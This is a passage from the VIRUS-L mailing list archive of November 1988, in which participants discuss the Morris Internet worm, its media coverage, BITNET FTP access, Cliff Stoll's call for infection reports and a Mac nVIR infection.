  3531. like it should have and the virus got into the system.
  3532.  
  3533. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  3534. | Leonard P. Levine               e-mail len@evax.milw.wisc.edu |
  3535. | Professor, Computer Science             Office (414) 229-5170 |
  3536. | University of Wisconsin-Milwaukee       Home   (414) 962-4719 |
  3537. | Milwaukee, WI 53201 U.S.A.              Modem  (414) 962-6228 |
  3538. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  3539. =========================================================================
  3540. Date:         Sat, 5 Nov 88 22:48:41 EST
  3541. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3542. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3543. From:         James Paterson <ACDJAMES@UOGUELPH>
  3544. In-Reply-To:  Message of Thu,
  3545.               3 Nov 88 13:01:00 CST from <troj@UMAXC.WEEG.UIOWA.EDU>
  3546.  
  3547. From what I have seen of OS/2, it does not allow application programs
  3548. direct access to memory.  All requests are routed, and there is virtual
  3549. addressing capabilites.  I have read (In a book written by the development
  3550. team) that the virtual addressing is automatic, and should be completely
  3551. transparent to applications written for the operating system.
  3552.  
  3553. This could provide some protection against viruses, but the operating
  3554. system would have to make sure that the application would not alter
  3555. the exe file, which I don't think it monitors.
  3556.  
  3557. James Paterson
  3558. (ACDJAMES@UOGUELPH)
  3559. =========================================================================
  3560. Date:         Sun, 6 Nov 88 09:48:25 +0200
  3561. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3562. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3563. From:         Ittai Klein <MLKLEIN@WEIZMANN>
  3564. Subject:      getting out
  3565.  
  3566. someone please tell me  the command I have to type to signoff
  3567. of this newsletter
  3568. =========================================================================
  3569. Date:         Sun, 6 Nov 88 13:18:25 GMT
  3570. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3571. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3572. From:         ZDEE676@OAK.CC.KCL.AC.UK
  3573.  
  3574. The unix sendmail virus got several columns in the SUnday Times newspaper
  3575. here in Britain.
  3576. They claimed that in was caused by a 23 year old student at Cornell
  3577. University.
  3578. The also said that the virus was incapable of spreading to the janet
  3579. network used in the UK due to "minor technical differences".
  3580. Any comments on the second part?
  3581.  
  3582. (John Burton) zdee67oak.cc.kcl.ac.uuk
  3583. =========================================================================
  3584. Date:         Sun, 6 Nov 88 13:47:00 CDT
  3585. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3586. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3587. From:         Gordon Keegan <C145GMK@UTARLG>
  3588. Subject:      Getting Debrain.c
  3589.  
  3590.         For those who don't have access to a machine that can FTP
  3591.         the debrain.c source, I can send a copy to those who request
  3592.         it.  I can also send a uuencoded copy of the debrain.exe
  3593.         file if you can't compile the source.
  3594.  
  3595.                                         Gordon Keegan
  3596.                                         c145gmk@utarlg.bitnet
  3597.                                         University of Texas, Arlington
  3598. =========================================================================
  3599. Date:         Sun, 6 Nov 88 17:42:00 EDT
  3600. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3601. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3602. From:         Savior faire is everywhere! <SSIRCAR@UMAECS>
  3603. Subject:      About the virus notices
  3604.  
  3605. Can we get a little organized around here?  I have just received two messages
  3606. containing the same article from RISK.  This is the second or third time this
  3607. happenned.  We should just designate one person to forward all messages from
  3608. RISK concerning the virus.
  3609.  
  3610.                                 -Santanu Sircar-
  3611. =========================================================================
  3612. Date:         Sun, 6 Nov 88 14:46:51 PST
  3613. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3614. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3615. From:         James Robert Dishaw <2JDISHAW@POMONA>
  3616. Subject:      Can the UNIX virus (or worm) spread onto Janet...
  3617.  
  3618. It really depends on how Janet is set up and how accesible Janet is to
  3619. ARPANet.  From my basic understanding (since I haven't seen the source
  3620. code of the virus/worm), it could possibly happen.  The infection does
  3621. not seem to be entirely dependent upon the network, but rather on the
  3622. victim machine.  The virus/worm can infect two ways:  Guess a password for
  3623. a valid userid (in which it is network specific, because it would have
  3624. to remotely login) or use the debug hole in SMTP.  The second case is
  3625. pretty independent from the network.  My suggestion would be to make sure
  3626. that if you are using SMTP (or something similar) that the debug option
  3627. is OFF.  This might entail recompiling in order to set the debug option
  3628. off.
  3629.                                            -Bob
  3630.                                             Pomona Consultant
  3631. =========================================================================
  3632. Date:         Sun, 6 Nov 88 16:57:00 MST
  3633. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3634. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3635. From:         Bernie <BSWIESER@UNCAMULT>
  3636. In-Reply-To:  Message of 5 Nov 88 11:18 MST from "SSAT at PACEVM"
  3637.  
  3638. Can anyone mail me privately a copy of the UNIX sendmail manual?
  3639. =========================================================================
  3640. Date:         Sat, 5 Nov 88 18:22:28 CST
  3641. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3642. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3643. From:         James Ford <JFORD1@UA1VM>
  3644. Subject:      FTP and BITNET
  3645.  
  3646. >>For those of us new to this, how do i get a file from umd5.umd.edu
  3647. >>over Bitnet?
  3648.  
  3649. >You don't.
  3650.  
  3651. >* FLAME ON *
  3652. >Bitnet is utterly incapable of supporting FTP, due to someone's decision
  3653. >to ignore the well-established TCP/IP protocol way back when Bitnet was
  3654. >founded.  I'm sure there was a good reason for this at the time (probably
  3655. >money), but it makes us look like fools today and I'm sick and tired of it.
  3656. >* FLAME OFF *
  3657.  
  3658. I'm not sure that this is correct.  I have been FTPing files for quite a
  3659. while from SimTel20, CUHUG and other places, and this is a BITNET node.
  3660. Perhaps your system isn't capable........  If you are able, here is
  3661. some FTP-available locations.
  3662.  
  3663.                          James Ford
  3664.                          jford1@ua1vm.BITNET
  3665.  
  3666. ------------------------------------------------------------------------
  3667. The following format is the same for all numbers on this list.
  3668.  
  3669. Name ------------ CUHUG BBS
  3670. Number.string --- 128.153.13.196
  3671. User id  -------- Anonymous
  3672. Password -------- guests
  3673.  
  3674. SimTel20
  3675. 26.0.0.74
  3676. Anonymous
  3677. guests
  3678.  
  3679. UXE.CSO.UIUC.EDU
  3680. 128.174.5.54
  3681. anonymous
  3682. guests
  3683.  
  3684. UDM.UND.EDU
  3685. 128.8.10.5
  3686. anonymous
  3687. guests
  3688. =========================================================================
  3689. Date:         Sun, 6 Nov 88 22:54:00 EST
  3690. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3691. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3692. From:         Jim Shaffer <SHAFFERJ@BKNLVMS>
  3693. Subject:      re: FTP and BITNET
  3694.  
  3695. When I sent that message about being unable to FTP over Bitnet, I was
  3696. aware that there are some Bitnet sites that are also Internet sites, but
  3697. I forgot to mention it.
  3698.  
  3699. If your Bitnet machine isn't on the Internet also, it can't FTP.
  3700.  
  3701. Or have they started implementing TCP/IP over RSCS (as it's rumored that
  3702. they will someday), and not told me?  (This is unlikely, but I've learned
  3703. never to leave out any possibility.)
  3704.  
  3705. Jim
  3706.  
  3707. PS:  About TCP/IP over RSCS:  I heard a rumor to that effect back around
  3708. the beginning of the year, and I managed to get one or two people who I
  3709. believed were in a position to know to admit that it was "under study."
  3710. This is all they could tell me, and I've heard nothing since.  Anybody
  3711. out there heard anything?  (Note:  This was apparently NOT the "Cypress"
  3712. project that they were referring to.  Cypress is/was (I'm not sure on its
  3713. status) a proposal to provide NSFNet access from other networks like Bitnet
  3714. and CSNet.  Someone please correct me if I'm wrong, because I haven't heard
  3715. anything about it lately either.)
  3716.  
  3717. PPS:  Let's not keep this up on Virus-L, though.  If there's any substance
  3718. to the rumors, it belongs over on Future-L, which was where I was told
  3719. that the plans were once discussed.  For the time being, please mail
  3720. anything on the subject directly to me.
  3721. =========================================================================
  3722. Date:         Mon, 7 Nov 88 02:17:24 EST
  3723. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3724. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3725. From:         The Arb Gary Kremen <89.KREMEN@GSB-HOW.STANFORD.EDU>
  3726. Subject:      Re: Getting Debrain.c
  3727. In-Reply-To:  Message from "Gordon Keegan <C145GMK@UTARLG.BITNET>" of Sun 6 No
  3728.               88 14:20:14-PST
  3729.  
  3730.  
  3731. -------
  3732. =========================================================================
  3733. Date:         Mon, 7 Nov 88 09:25:33 +0200
  3734. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3735. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3736. From:         Omer Zak <XLACHA1@WEIZMANN>
  3737. Subject:      The INTERNET/MILNET virus
  3738.  
  3739. Here are my 0.03NS (approx. $0.02) about defense against this virus (or
  3740. bacterium or worm, whatever it is) and similar virii in the future.
  3741.  
  3742. It is said that the British JANET is immune against this virus (not sure)
  3743. because it uses somewhat different protocols.  Also, IBM mainframes, CRAY,
  3744. and non-UNIX operating systems were spared from this virus, although in
  3745. principle a more sophisticated virus can be written to infect everything
  3746. (the idea of having it copy over a source program and compile it on the
  3747. target computer is VERY clever indeed).
  3748.  
  3749. The way to make it very difficult for this virus (and similar) to spread
  3750. even if it compiles source code in-situ is to make each link in each network
  3751. run a different protocol|  And make it impossible to guess what exact protocol
  3752. is being used in each link.  It may be a thing like changing the order of
  3753. fields in packets, different command names and the like.  Make it a bit
  3754. harder to port programs and shell scripts from one system to another, by
  3755. contriving some system-specific command names (users may be asked to run
  3756. an 'incoming translation' program on scripts which they accept from other
  3757. systems, before the scripts can be run on their own systems; the 'incoming
  3758. translation' program should have a different name in each system, and not
  3759. be easy to locate).  In short, make it difficult for a virus to figure out
  3760. how to send files to the next computer yet keep them alive.
  3761.                                                          --- Omer
  3762. "Be accessible to deaf persons via the phone.  Make sure you have a
  3763. Bell 103 compatible modem at your home."
  3764. =========================================================================
  3765. Date:         Mon, 7 Nov 88 08:10:20 EST
  3766. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3767. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3768. From:         Ken van Wyk <luken@SPOT.CC.LEHIGH.EDU>
  3769. Subject:      administravia
  3770.  
  3771.  
  3772. First of all, I'd like to thank everyone who sent in useful information about
  3773. the recent Internet Virus.  I'd also like to point out, as someone mentioned,
  3774. that we did get a lot of duplication during the "storm".  In particular, the
  3775. RISKS digest articles were sent to the list at least 4 or 5 times!  That's
  3776. senseless and it only clogs peoples' mailboxes.  Also, messages like "how do I
  3777. get off of this list?" should be sent directly to me, the list owner.  Things
  3778. obviously got rather hectic on Friday and over the weekend; let's please try
  3779. to remain sane, even in circumstances like that.  Thanks in advance!
  3780.  
  3781. On another note, I'd like to hear (privately) from people who found that the
  3782. information on the Internet Virus that they received via VIRUS-L was useful in
  3783. containing the virus at their site(s).  It's primarily a personal interest
  3784. matter, and I'll summarize to the list after I've received some responses.
  3785. So, people who run BSD 4.3 machines that were infected by this virus, please
  3786. send me a one-liner (or whatever you want) just saying whether or not you
  3787. found the information on VIRUS-L useful.  Thanks.
  3788.  
  3789. Ken
  3790.  
  3791.  
  3792.  
  3793. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  3794. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  3795. Lehigh University Computing Center        coffee table?!
  3796. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  3797. BITNET:   <LUKEN@LEHIIBM1>                question?
  3798. =========================================================================
  3799. Date:         Mon, 7 Nov 88 09:21:53 EST
  3800. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3801. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3802. From:         "Kenneth R. van Wyk" <LUKEN@LEHIIBM1>
  3803. Subject:      Forwarded request for statistics on Internet Virus
  3804.  
  3805.  
  3806.  
  3807.      The following request was forwarded to me; please respond directly
  3808.      to the sender, Cliff Stoll <cliff@Lbl.Bitnet>:
  3809.  
  3810.  
  3811. Date:     Sun, 6 Nov 88 05:34:47 PST
  3812. From:     cliff@Lbl.Bitnet (Cliff Stoll)
  3813.  
  3814.  
  3815.  COLLECTING ARPANET VIRUS STORIES
  3816.  
  3817. I'm collecting information about the Nov 3 Arpanet virus,
  3818. trying to determine:
  3819.      > How many sites were infected
  3820.      > How many were not
  3821.      > How quickly it spread
  3822.  
  3823. SO:  If you were infected, please send me a note describing
  3824. your experiences.  Please include:
  3825.      > Where are you?  What type of computers?
  3826.      > What times were stamped on the /usr/tmp/x files?
  3827.      > Which of your computers were infected?  All of them?
  3828.  
  3829. Please send your anecdotes & stories, such as:
  3830.      >  What time did you discover it?
  3831.      >  What tipped you off?
  3832.      >  How did you and your colleagues respond?
  3833.      >  What would you differently?
  3834.      >  Did you call anyone?  Or did anyone call you?
  3835.      >  Where would you turn for information next time?
  3836.      >  When did you finally eradicate it?
  3837.      >  Any weird wrinkles or strange effects?
  3838.  
  3839. I'm interested in hearing from you even if you were not infected!
  3840.  
  3841. Please pass this message on to others:
  3842. I would rather have multiple responses from a site than none.
  3843.  
  3844. Thank you very much for your time & trouble.
  3845. In return, I'll mail summaries to everyone that contributes.
  3846. If you'd like a copy, please include your address.
  3847.  
  3848.  
  3849. Thank you very much for your time & troubles!
  3850.  
  3851. Cliff Stoll                Harvard/Smithsonian Center for Astrophysics
  3852. 617/495-7147               60 Garden Street,  Cambridge, MA 02138
  3853. Cliff@cfa200.harvard.edu   ( or on bitnet,  Cliff@lbl )   [Nov 5, '88]
  3854.  
  3855. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  3856. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  3857. Lehigh University Computing Center        coffee table?!
  3858. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  3859. BITNET:   <LUKEN@LEHIIBM1>                question?
  3860. =========================================================================
  3861. Date:         Mon, 7 Nov 88 09:28:56 EST
  3862. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3863. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3864. From:         "Kenneth R. van Wyk" <LUKEN@LEHIIBM1>
  3865. Subject:      forwarded comments on Internet virus from W.H. Murray
  3866.  
  3867.  
  3868.  
  3869. Date:  Fri, 4 Nov 88 10:29 EST
  3870. From:  WHMurray@DOCKMASTER.ARPA
  3871. Subject:  Unix Virus
  3872.  
  3873.  
  3874. The New York Times quotes an unidentified caller as saying "because the
  3875. designer did not understand how the network worked, it [the virus]
  3876. quickly copied itself thousands of times from machine to machine."
  3877.  
  3878. The sorceror's apprentice strikes again.
  3879.  
  3880. William Hugh Murray, Fellow, Information System Security, Ernst & Whinney
  3881. 2000 National City Center Cleveland, Ohio 44114
  3882. 21 Locust Avenue, Suite 2D, New Canaan, Connecticut 06840
  3883.  
  3884. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  3885. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  3886. Lehigh University Computing Center        coffee table?!
  3887. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  3888. BITNET:   <LUKEN@LEHIIBM1>                question?
  3889. =========================================================================
  3890. Date:         Mon, 7 Nov 88 07:34:00 EST
  3891. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3892. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3893. From:         "Joseph M. Beckman" <Beckman@DOCKMASTER.ARPA>
  3894.  
  3895.  
  3896. [0666] (42 lines) Stoll.CCS 11/06/88  0806.7 est Sun bb
  3897. Subject:  Re: Virus on the Arpanet
  3898.  
  3899.   *** PLEASE DISTRIBUTE THIS NOTE WIDELY   THANK YOU! ***REDISTRIBUTE THIS NOTE
  3900.  TO ANY PLACE YOU THINK BEST - THANX!***
  3901.  
  3902.  COLLECTING ARPANET VIRUS STORIES
  3903.  
  3904. I'm collecting information about the Nov 3 Arpanet virus, trying to
  3905. determine:
  3906.      > How many sites were infected
  3907.      > How many were not
  3908.      > How quickly it spread
  3909.  
  3910. SO:  If you were infected, please send me a note describing your
  3911. experiences.  Please include:
  3912.      > Where are you?  What type of computers? }i     > What times were
  3913. stamped on the /usr/tmp/x files?
  3914.      > Which of your computers were infected?  All of them?
  3915.  
  3916. Please send your anecdotes & stories, such as:
  3917.      >  What time did you discover it?
  3918.      >  What tipped you off?
  3919.      >  How did you and your colleagues respond?
  3920.      >  What would you differently?
  3921.      >  Did you call anyone?  Or did anyone call you?
  3922.      >  Where would you turn for information next time?
  3923.      >  When did you finally eradicate it?
  3924.      >  Any weird wrinkles or strange effects?
  3925.  
  3926. I'm interested in hearing from you even if you were not infected!
  3927.  
  3928. Please pass this message on to others: I would rather have multiple
  3929. responses from a site than none.
  3930.  
  3931. Thank you very much for your time & trouble. In return, I'll mail
  3932. summaries to everyone that contributes. If you'd like a copy, please
  3933. include your address.
  3934.  
  3935.  
  3936. Thank you very much for your time & troubles!
  3937.  
  3938. Cliff Stoll                Harvard/Smithsonian Center for Astrophysics
  3939. 617/495-7147               60 Garden Street,  Cambridge, MA 02138 lbl )
  3940. [Nov 5, '88]
  3941. ---[0666]--- (pref = [0665], nref = [0667])
  3942. =========================================================================
  3943. Date:         Mon, 7 Nov 88 14:51:10 GMT
  3944. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3945. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3946. From:         ZDEE676@OAK.CC.KCL.AC.UK
  3947. Subject:      Networks
  3948.  
  3949. It seems the latest virus had trouble spreading across networks.
  3950. Can anyone out there explain to me what networks there are and how they
  3951. are connected. It seems there are many networks, many of which connect
  3952. the same sites together.
  3953. As this isn't strictly relevent, it maigh tbe better to directly mail me..
  3954.  
  3955. John Burton (King's College London)
  3956. zdee676@uk.ac.kcl.cc.oak
  3957.  
  3958. or possibly zdee676@oak.cc.kcl.ac.uk  (I'm never sure which it is )
  3959. =========================================================================
  3960. Date:         Mon, 7 Nov 88 10:02:00 EDT
  3961. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3962. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3963. Comments:     Warning -- RSCS tag indicates an origin of SMTPUSER@OBERLIN
  3964. From:         "$CAROL@OBERLIN (BITNET)" <$CAROL@OBERLIN>
  3965. Subject:      Trojan vote counting?
  3966.  
  3967. The 11/7 issue of The NEW YORKER carries an article, "Counting Votes," about
  3968. the lack of safeguards in such election equipment as the Votomatic system.
  3969. The potential for dastardly deeds of the kind VIRUS-L discusses seems immense.
  3970.  
  3971.         |  Carol Conti-Entin   (216) 775-8290
  3972.         |  $carol@oberlin   -or-   pconti@oberlin  (BITNET)
  3973.         |  Academic Computing Consultant
  3974.         |  Houck Computing Center
  3975.         |  Oberlin College
  3976.         |  Oberlin, OH  44074
  3977. =========================================================================
  3978. Date:         Mon, 7 Nov 88 10:51:24 EST
  3979. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  3980. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  3981. From:         "Kenneth R. van Wyk" <LUKEN@LEHIIBM1>
  3982. Subject:      forwarded comments on media coverage from J.D. Abolins
  3983.  
  3984.  
  3985. The following are some remarks from J.D. Abolins regarding the media
  3986. coverage of the Internet Virus:
  3987.  
  3988.  
  3989. Quick glimpses of media handling of the ARPNET case....
  3990.  
  3991. I first heard about the ARPNET case through a Cable News Network
  3992. television story about the case last Thursday night. The story was
  3993. some vague and appeared quite incomplete.It mentioned that a "virus"
  3994. had affected a computer network linking academic and govenment computer
  3995. centers accross the United States. No mention was made ofthe specific
  3996. network. Nor was there a clear explanation of exactly what kinds of
  3997. computers were affected. THe film footage kept on going back to a
  3998. CRAY supercomputer array. In short, the main thing that could be
  3999. derived form the sory was that something had happened to amy computer
  4000. systems, tying them up. The rest was obscurred, mostly due to the
  4001. reporters' lack of knowledge about the computer viruses and computers
  4002. in general.
  4003.  
  4004. The next report I heard was from CBS News Radio. This report had
  4005. more details, but still sketchy.
  4006.  
  4007. Then, I read the Friday New York Times article by John Markoff.
  4008. While the article did not clarify how much of the actual problems
  4009. were caused by the problem program acting like a virus and how
  4010. much was caused by it acting as a bactrium, it was a well detailed
  4011. report.(I've seen it reprinted on RISKS DIGEST. Since I have not
  4012. gotten my last week's VIRUS-L LOG, I don't know if the reprint got
  4013. to VIRUS-L.)
  4014.  
  4015. I am still going through the flurry of reports and articles about the
  4016. case that have appeared over the past few days. But here are a couple
  4017. of other items that have appaered lately.
  4018.  
  4019. On the NBC comedy program Saturday Night Live, Dennis Miller, the
  4020. anchorman for a TV news parody, commented about computer viruses to
  4021. the effect, "Remember, when you are uplinking to another computer,
  4022. you are uplinking to every computer that the other computer has uplinked
  4023. to." (Analogy to comments made about AIDS.)
  4024.  
  4025. This morning, NBC's TODAY news sfeature show had a segment on the
  4026. ARPNET case. The program interviewed John McAfee of the Computer
  4027. Virus Association in a television link to San Francisco, Calif.
  4028. Mr. AcFee estimated the losses to the case to be about $20 million
  4029. spent in manhours to clean-up the affected systems. He said that
  4030. if the virushad destroyed data, the damages would have been in the
  4031. billions of dollars. The Computer Virus Association claims that it
  4032. has counted 300 virus cases. During the interview, Mr. McAfee
  4033. explained that the the "virus" was not originally intended to be
  4034. harmfull. Rather, it was intended to travel slowly through the
  4035. network leaving its copies as "flags" attesting to the program's
  4036. spread. But a programming error resulted in the rapid replication
  4037. that clogged the computer resources. When asked if there were any
  4038. absolute safeguards against viruses, Mr. McAfee replied that while
  4039. known cases can be effectively countered, the development of new
  4040. "viruses" preclude an absolute, 100% protection scheme.
  4041.  
  4042. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  4043. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  4044. Lehigh University Computing Center        coffee table?!
  4045. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  4046. BITNET:   <LUKEN@LEHIIBM1>                question?
  4047. =========================================================================
  4048. Date:         Mon, 7 Nov 88 07:34:00 EST
  4049. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4050. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4051. From:         "Joseph M. Beckman" <Beckman@DOCKMASTER.ARPA>
  4052.  
  4053.  
  4054. [0666] (42 lines) Stoll.CCS 11/06/88  0806.7 est Sun bb
  4055. Subject:  Re: Virus on the Arpanet
  4056.  
  4057.   *** PLEASE DISTRIBUTE THIS NOTE WIDELY   THANK YOU! ***REDISTRIBUTE THIS NOTE
  4058.  TO ANY PLACE YOU THINK BEST - THANX!***
  4059.  
  4060.  COLLECTING ARPANET VIRUS STORIES
  4061.  
  4062. I'm collecting information about the Nov 3 Arpanet virus, trying to
  4063. determine:
  4064.      > How many sites were infected
  4065.      > How many were not
  4066.      > How quickly it spread
  4067.  
  4068. SO:  If you were infected, please send me a note describing your
  4069. experiences.  Please include:
  4070.      > Where are you?  What type of computers? }i     > What times were
  4071. stamped on the /usr/tmp/x files?
  4072.      > Which of your computers were infected?  All of them?
  4073.  
  4074. Please send your anecdotes & stories, such as:
  4075.      >  What time did you discover it?
  4076.      >  What tipped you off?
  4077.      >  How did you and your colleagues respond?
  4078.      >  What would you differently?
  4079.      >  Did you call anyone?  Or did anyone call you?
  4080.      >  Where would you turn for information next time?
  4081.      >  When did you finally eradicate it?
  4082.      >  Any weird wrinkles or strange effects?
  4083.  
  4084. I'm interested in hearing from you even if you were not infected!
  4085.  
  4086. Please pass this message on to others: I would rather have multiple
  4087. responses from a site than none.
  4088.  
  4089. Thank you very much for your time & trouble. In return, I'll mail
  4090. summaries to everyone that contributes. If you'd like a copy, please
  4091. include your address.
  4092.  
  4093.  
  4094. Thank you very much for your time & troubles!
  4095.  
  4096. Cliff Stoll                Harvard/Smithsonian Center for Astrophysics
  4097. 617/495-7147               60 Garden Street,  Cambridge, MA 02138 lbl )
  4098. [Nov 5, '88]
  4099. ---[0666]--- (pref = [0665], nref = [0667])
  4100. =========================================================================
  4101. Date:         Mon, 7 Nov 88 14:07:21 EST
  4102. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4103. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4104. From:         Joe Sieczkowski <joes@SCARECROW.CSEE.LEHIGH.EDU>
  4105. Subject:      Who is
  4106.  
  4107.  
  4108. Who is the Computer Virus Association and who are they affiliated
  4109. with.  Are they just some private group?
  4110.  
  4111. Joe
  4112. =========================================================================
  4113. Date:         Mon, 7 Nov 88 16:24:45 EST
  4114. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4115. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4116. From:         OJA@NCCIBM1
  4117.  
  4118. Quick correction: In my previous message, I rendered the network
  4119. that was affected by a "virus" as ARPNET. It should be read as
  4120. ARPANET. The ARPA comes from the abbreviation for
  4121. Defense Advanced Research Projects Agency. (The "D" for Defense is
  4122. not used.)
  4123.  
  4124. As for the question about the Computer Virus Association, I myself
  4125. am trying to find out more about it. It seems to be an association
  4126. for developers of anti-viral software. From what I saw this
  4127. morning,John McAfee is considered as one of its spokespeople.
  4128. =========================================================================
  4129. Date:         Mon, 7 Nov 88 17:59:00 EST
  4130. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4131. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4132. From:         Dimitri Vulis <DLV@CUNYVMS1>
  4133. Subject:      Computer Virus Association
  4134.  
  4135.  
  4136. MIS week, vol 9, no 35 (aug 29 this year) had a first-page feature blasting
  4137. the Computer Virus Industry Association and its leader John McAfee.
  4138. (the later also runs the National Bulletin Board Society)
  4139. There was also some negative stuff in PC WEEK.
  4140. The article is pretty long; if there is sufficient interest, I'll key
  4141. in a digest.
  4142. By the way, this coming Friday I'm giving a talk in class about computer viri;
  4143. are there any suggestions as to what I should say?
  4144. -Dimitri
  4145. =========================================================================
  4146. Date:         Mon, 7 Nov 88 18:51:24 GMT
  4147. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4148. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4149. From:         ZDEE731@ELM.CC.KCL.AC.UK
  4150. Subject:      RETRIBUTION OR REDISTRIBUTION EVEN
  4151.  
  4152. From:    Virus Discussion List <VIRUS-L@EARN.LEHIIBM1>  7-NOV-1988 18:39
  4153. To:    ZDEE731
  4154. Subj:
  4155.  
  4156.  
  4157. Received: from UKACRL by UK.AC.RL.IB (Mailer X1.25) with BSMTP id 5375; Mon, 07
  4158.           Nov 88 18:18:58 GM
  4159. Received: by UKACRL (Mailer X1.25) id 6488; Mon, 07 Nov 88 18:18:56 GMT
  4160. Date:     Mon, 7 Nov 88 07:34:00 EST
  4161. Reply-To: Virus Discussion List <VIRUS-L@EARN.LEHIIBM1>
  4162. Sender:   Virus Discussion List <VIRUS-L@EARN.LEHIIBM1>
  4163. From:     "Joseph M. Beckman" <Beckman@ARPA.DOCKMASTER>
  4164. To:       Bob Jolly <ZDEE731@UK.AC.KCL.CC.ELM>
  4165.  
  4166.  
  4167. [0666] (42 lines) Stoll.CCS 11/06/88  0806.7 est Sun bb
  4168. Subject:  Re: Virus on the Arpanet
  4169.  
  4170.   *** PLEASE DISTRIBUTE THIS NOTE WIDELY   THANK YOU! ***REDISTRIBUTE THIS NOTE
  4171.  TO ANY PLACE YOU THINK BEST - THANX!***
  4172.  
  4173.  COLLECTING ARPANET VIRUS STORIES
  4174.  
  4175. I'm collecting information about the Nov 3 Arpanet virus, trying to
  4176. determine:
  4177.      > How many sites were infected
  4178.      > How many were not
  4179.      > How quickly it spread
  4180.  
  4181. SO:  If you were infected, please send me a note describing your
  4182. experiences.  Please include:
  4183.      > Where are you?  What type of computers? i     > What times were
  4184. stamped on the /usr/tmp/x files?
  4185.      > Which of your computers were infected?  All of them?
  4186.  
  4187. Please send your anecdotes & stories, such as:
  4188.      >  What time did you discover it?
  4189.      >  What tipped you off?
  4190.      >  How did you and your colleagues respond?
  4191.      >  What would you differently?
  4192.      >  Did you call anyone?  Or did anyone call you?
  4193.      >  Where would you turn for information next time?
  4194.      >  When did you finally eradicate it?
  4195.      >  Any weird wrinkles or strange effects?
  4196.  
  4197. I'm interested in hearing from you even if you were not infected!
  4198.  
  4199. Please pass this message on to others: I would rather have multiple
  4200. responses from a site than none.
  4201.  
  4202. Thank you very much for your time & trouble. In return, I'll mail
  4203. summaries to everyone that contributes. If you'd like a copy, please
  4204. include your address.
  4205.  
  4206.  
  4207. Thank you very much for your time & troubles!
  4208.  
  4209. Cliff Stoll                Harvard/Smithsonian Center for Astrophysics
  4210. 617/495-7147               60 Garden Street,  Cambridge, MA 02138 lbl )
  4211. [Nov 5, '88]
  4212. ---[0666]--- (pref = [0665], nref = [0667])
  4213. =========================================================================
  4214. Date:         Mon, 7 Nov 88 16:07:53 PST
  4215. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4216. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  4217. From:         Sam Cropsey <SAM@POMONA>
  4218. Subject:      nVIR virus
  4219.  
  4220. We recently had an attack of the nVIR virus and I need more info about it.
  4221. I read an article by Mike Scanlin in MacTutor that was very helpful.  However
  4222. the article failed to mention what to do if the virus settled in a desk acceso
  4223. y or in the Finder.  If anyone has more info, please let me know.
  4224. Thank you...
